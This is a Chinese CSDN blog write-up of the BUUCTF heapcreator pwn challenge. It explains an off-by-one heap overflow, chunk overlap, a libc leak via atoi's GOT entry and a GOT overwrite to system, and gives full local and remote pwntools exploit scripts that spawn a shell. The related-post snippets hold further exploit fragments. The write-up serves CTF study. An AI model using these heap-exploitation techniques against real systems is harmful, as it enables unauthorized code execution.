pwn刷题num47---off by one 修改size大小,造成堆块重叠,控制chunk内容指针,泄露函数真实地址,修改got表,调用system

最新推荐文章于 2023-11-18 00:05:12 发布
最新推荐文章于 2023-11-18 00:05:12 发布
阅读量505 收藏 2
点赞数
分类专栏: 堆利用 BUUCTF pwn 文章标签: c语言 安全 linux python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124562892
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏
堆利用
18 篇文章 1 订阅
订阅专栏
本文详细分析了一款64位程序的堆溢出漏洞,通过创建、编辑和删除堆来操纵内存,最终实现修改 GOT 表并触发系统函数调用,从而获取 shell。过程中涉及了 RELRO、Canary、NX 和 PIE 等保护机制的绕过,以及 libc 版本的确定和利用。
摘要由CSDN通过智能技术生成

BUUCTF-PWN-hitcontraining_heapcreator

在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
在这里插入图片描述

64位程序,小端序
开启部分RELRO-----got表仍可写
开启canary保护-----栈溢出需绕过canary
开启NX保护-----堆栈不可执行
未开启PIE----函数地址为真实地址
动态链接

运行一下试试
在这里插入图片描述
在这里插入图片描述
功能基本上就是

1. 创建堆
2. 编辑堆 
3.显示堆 
4.删除堆 
5.退出

ida看一下伪代码
主函数就是根据选择调用不同的子函数
在这里插入图片描述

create_heap()函数创造一个堆,这里可以观察到我先是输入一个数字赋值给了size,然后后面又把size赋值给了*(_QWORD *)heaparray[i],作为chunk的size大小,先是申请一个0x20大小的chunk,mem里存放下一个chunk大小,然后又申请size大小的chunk
在这里插入图片描述

read_input(*((void **)heaparray[i] + 1), size);就相当于是read函数
就是
在这里插入图片描述

delete_heap()函数,删除一个堆,free掉两个chunk后,只把第一个chunk指针置空,第二个chunk(内容chunk)未置空
在这里插入图片描述

edit_heap()函数,编辑一个堆修改内容chunk时,

read_input(*((void **)heaparray[v1] + 1), *(_QWORD *)heaparray[v1] + 1LL);

*(_QWORD *)heaparray[v1] 已经是chunk的size大小了,然后 *(_QWORD *)heaparray[v1] + 1就导致可以往mem里写入一字节,造成off by one
在这里插入图片描述

show_heap()函数,输出一个堆

在这里插入图片描述

思路

用creat_heap创造两个heap(内容chunk的mem大小分别为0x18和0x10),利用edit_heap()函数的漏洞,往下一chunk多写一字节,可以覆盖掉下一chunk的size大小(这里改为0x41),使之size变大,之后free掉chunk,fast bin里出现两个chunk(0x20和0x40)(重叠的chunk),再次申请之后造成两堆块重叠,修改内容chunk可以修改大小chunk(记录内容chunk的大小),可以把一个libc里的函数got表地址(这里选atoi函数)写入大小chunk,之后用show_heap可以把atoi函数的真实地址泄露出来,再根据相对偏移不变,找出system函数地址,利用edit_heap把system函数地址覆盖掉atoi函数的got表地址,当程序再次调用atoi函数时,就相当于调用system函数,一开始正好有个read函数(只能最多输入4字节),我们直接输入sh字符串就可以获得shell
在这里插入图片描述

关于libc的获取,题目是ubuntu16,可以在buuctf上找到libc源码
libc源码下载
在这里插入图片描述
白色部分即为libc版本,利用glibc-all-in-one和patchelf即可修改程序加载动态链接库,进行本地调试

exp本地调试

from pwn import *
context(log_level='debug',os='linux',endian='little',arch='amd64')
context.terminal = ["gnome-terminal", "-x", "sh", "-c"]
 
sh = process("./buuctfheapcreator")
#sh = remote('node4.buuoj.cn',25501)
elf = ELF("./buuctfheapcreator")
libc = ELF("/home/binary/tools/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6") 

def dbg():
	gdb.attach(sh)
	pause()

def create(size, content):
    sh.sendlineafter(" :", "1")
    

    sh.sendlineafter(" : ", str(size))
    sh.sendlineafter(":", content)

def edit(idx, content):
    sh.sendlineafter(" :", "2")
    sh.sendlineafter(" :", str(idx))
    sh.sendlineafter(" : ", content)

def show(idx):
    sh.sendlineafter(" :", "3")
    sh.sendlineafter(" :", str(idx))
    
def delete(idx):
    sh.sendlineafter(" :", "4")
    sh.sendlineafter(" :", str(idx))

def main():
    create(0x20 - 0x8, "aaaa")  #申请一个mem为0x18大小的内容chunk,heap编号为0
    create(0x10, "bbbb")    ##申请一个mem为0x10大小的内容chunk,heap编号为1

    dbg()#断点1

    edit(0, b"a" * 0x18 + p8(0x41)) # 覆盖第二个heap的第一个chunk的size大小为0x41,

    dbg()#断点2

    delete(1)  #free1号heap,内容chunk的mem指针未置空。
            #现在fast bin有两个chunk,分别为0x40大小和0x20大小,其中0x20大小的chunk重叠于ox40大小的chunk
    
    dbg()#断点3

    payload = p64(0) * 4 + p64(0x30) + p64(elf.got["atoi"])   
    create(0x30, payload)  #申请free后的0x40(0x30+0x10)大小的chunk作为内容chunk,heap编号为1,
                            #申请free后的0x20大小的chunk作为大小chunk(记录内容chunk的大小),
                            #造成两堆块重叠,修改内容chunk可以修改大小chunk
                        #2号chunk的mem内容前0x20字节随便写(这里写了四个int0,一个0占8字节),
                        #之后写入0x30,伪造chunk,内容为atoi的got表地址
    
    dbg()#断点4

    show(1)   #输出1号chunk的mem内容,即atoi的got表对于的函数真实地址
    libcBase = u64(sh.recvuntil("\x7f")[-6: ].ljust(8, b"\x00")) - libc.symbols["atoi"] #接收atoi真实地址,计算相对偏移量
    print('libcBase = '+hex(libcBase))
   
 
    system_addr = libcBase + libc.symbols["system"]  
    print('system_addr = '+hex(system_addr))
    
   

    edit(1, p64(system_addr))  #编辑大小chunk(此时该chunk存放的是atoi的got表地址),修改atoi的got表地址为system函数地址
    
    dbg()#断点5

    #delete(0)
    sh.sendlineafter(" :", "sh")  #read函数输入sh,作为system参数
    sh.interactive()
main()

运行

在这里插入图片描述

在这里插入图片描述
断点1处,可以看到申请了两个,出现了四个chunk,分别为存放大小的chunk和存放内容的chunk,其中大小chunk指向内容chunk
在这里插入图片描述

0xcd9040:	0x6161616161616161	0x0000000000000041

断点2处,可以看到第二个chunk已经被我们修改为了0x40大小(0x41是因为上一个chunk还在被使用)
在这里插入图片描述
断点3处,我们可以看到free第二个chunk后,fast bins出现两个chunk(0x40和0x20)
在这里插入图片描述

0xcd9070:	0x0000000000000030	0x0000000000602060

断点4处,可以看到我们已经把大小chunk指向内容chunk的指针改为了指向atoi的got表地址
在这里插入图片描述

0x602060 <atoi@got.plt>:	0x00007fbda3d31e90

而且可以看到atoi的got表内容
在这里插入图片描述

0x602060 <atoi@got.plt>:	0x00007fbda3d403a0

断点5处可以发现atoi的got表地址变了,就是变为了我们写入的system函数地址
接着运行,获得shell
在这里插入图片描述
exp远程

from pwn import *
context(log_level='debug',os='linux',endian='little',arch='amd64')
context.terminal = ["gnome-terminal", "-x", "sh", "-c"]
 
#sh = process("./buuctfheapcreator")
sh = remote('node4.buuoj.cn',25501)
elf = ELF("./buuctfheapcreator")
libc = ELF("/home/binary/tools/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6") 

def dbg():
	gdb.attach(sh)
	pause()

def create(size, content):
    sh.sendlineafter(" :", "1")
    

    sh.sendlineafter(" : ", str(size))
    sh.sendlineafter(":", content)

def edit(idx, content):
    sh.sendlineafter(" :", "2")
    sh.sendlineafter(" :", str(idx))
    sh.sendlineafter(" : ", content)

def show(idx):
    sh.sendlineafter(" :", "3")
    sh.sendlineafter(" :", str(idx))
    
def delete(idx):
    sh.sendlineafter(" :", "4")
    sh.sendlineafter(" :", str(idx))

def main():
    create(0x20 - 0x8, "aaaa")  #申请一个mem为0x18大小的内容chunk,heap编号为0
    create(0x10, "bbbb")    ##申请一个mem为0x10大小的内容chunk,heap编号为1

    #dbg()

    edit(0, b"a" * 0x18 + p8(0x41)) # 覆盖第二个heap的第一个chunk的size大小为0x41,

   # dbg()

    delete(1)  #free1号heap,内容chunk的mem指针未置空。
            #现在fast bin有两个chunk,分别为0x40大小和0x20大小,其中0x20大小的chunk重叠于ox40大小的chunk
    
    #dbg()

    payload = p64(0) * 4 + p64(0x30) + p64(elf.got["atoi"])   
    create(0x30, payload)  #申请free后的0x40(0x30+0x10)大小的chunk作为内容chunk,heap编号为1,
                            #申请free后的0x20大小的chunk作为大小chunk(记录内容chunk的大小),
                            #造成两堆块重叠,修改内容chunk可以修改大小chunk
                        #2号chunk的mem内容前0x20字节随便写(这里写了四个int0,一个0占8字节),
                        #之后写入0x30,伪造chunk,内容为atoi的got表地址
    
   # dbg()

    show(1)   #输出1号chunk的mem内容
    libcBase = u64(sh.recvuntil("\x7f")[-6: ].ljust(8, b"\x00")) - libc.symbols["atoi"] #接收atoi真实地址,计算相对偏移量
    print('libcBase = '+hex(libcBase))
   
 
    system_addr = libcBase + libc.symbols["system"]  
    print('system_addr = '+hex(system_addr))
    
 

    edit(1, p64(system_addr))  #编辑大小chunk(此时该chunk存放的是atoi的got表地址),修改atoi的got表地址为system函数地址
    
    #dbg()

    #delete(0)
    sh.sendlineafter(" :", "sh")  #read函数输入sh,作为system参数
    sh.interactive()
main()

运行获得shell 在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
专栏目录
pwn 堆入门之off by one
清霂的博客
04-18 244
目录Asis CTF 2016 b00ks Asis CTF 2016 b00ks #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "b00ks" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) menu_addr=0x0000000000000A89 free_got
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1103
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 355
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
CTF-PWN-堆- 【off-by-one】
最新发布
llovewuzhengzi的博客
11-18 485
(2)可以利用同时构造pre_size和对应的NULL字节溢出,然后unlink时合并,此方法的关键在于 unlink 的时候没有检查按照 prev_size 找到的块的大小与prev_size 是否一致。两坨空间:off_202010和0ff_202018分别存储着偏移202060和202040的地址,偏移202060对应的是author name的,偏移202040对应的是第三类堆块地址。7将虚假chunk的部位设置为某位置的地址即可得到该地址内容,再次利用printf导致泄露,从而知道函数地址
pwn-堆溢出off-by-one
CharlesGodX的博客
04-17 1843
Thunder_J@Thunder_J-virtual-machine:~/桌面$ python exp.py [+] Starting local process './Storm_note': pid 16030 [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/Storm_note' Arch: amd64-64-little ...
[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got
mcmuyanga的博客
03-18 486
wustctf2020_name_your_dog 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb 主要函数,感觉跟cat那题差不多 漏洞函数 ...
BUUCTF-PWN刷题记录-21
weixin_44145820的博客
05-15 697
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
PWN · 栈迁移|off-by-one|伪随机|爆破】[HDCTF 2023]Makewish
Mr_Fmnwon的博客
11-03 293
一道精巧、包含很多要点的题目。
puts函数泄露地址
Sakura给爷pwn全场
12-17 993
CTF中的PWN——绕CANARY防护3(选择项+PUTS带出CANARY+泄露函数地址计算基地址): https://www.freesion.com/article/5901691025/ 利用puts函数泄露libc内存信息: https://www.it610.com/article/1296102748638486528.htm
格式化字符串之在栈上修改got,执行system(“/bin/sh“)
fzucaicai的博客
03-05 773
举个例子, payload = fmtstr_payload(7 , {printf_got : system_addr}) 其中,7。
Pwn-最简单栈溢出(2018铁三云贵赛区)write函数泄露+用地址跳回重执行主函数
publicStr的博客
05-16 4613
开始前的例行叨叨:这大概是最简单的pwn题了吧,直接溢出的。主要是记录下write函数泄露动态地址的姿势,还有程序执行完一次就退出了,如何在溢出的末尾让它重执行,以及从lic中提取地址的姿势。...
BUUCTF之off by one漏洞
weixin_45441024的博客
05-21 489
BUUCTF npuctf_2020_easyheap 首先分析一下这个程序,PIE关闭,说明可以修改got 大概看一下程序的执行机制 堆题常见菜单结构 def add(size,content): p.sendlineafter('Your choice :',str(1)) p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size)) p.sendlineafter('Content:',content) def edit(
libc泄露以及偏移
RKAnjia的博客
03-23 680
payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+ p32(write_plt) + p32(start)(返回地址) + p32(1)+ p32(write_got)+p32(4) 后面三个是write函数的参数 write(1,‘write_got’,4) 4代输出4个字节,write_got则为要泄露地址 write函数原型是write(fd, addr, len),即将addr作为起始地址,读取len字节的数据到文件流fd(0示标准输入流stdin、1示标准输出流s
格式化字符串漏洞泄露got
Fzuim的博客
11-20 711
#include <stdio.h> int main() { char s[100]; scanf("%s", s); printf(s); return 0; } 编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c 泄露的payload先贴出来,再理解 # coding:utf-8 from pwn import* from LibcSearcher import * context.log_level = '
Chunk Extend/Overlapping | 堆拓展、重叠
SkYe's Blog
08-06 1840
堆拓展&溢出 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend 是堆漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于堆的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对堆 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk大小的操作如
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2788
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值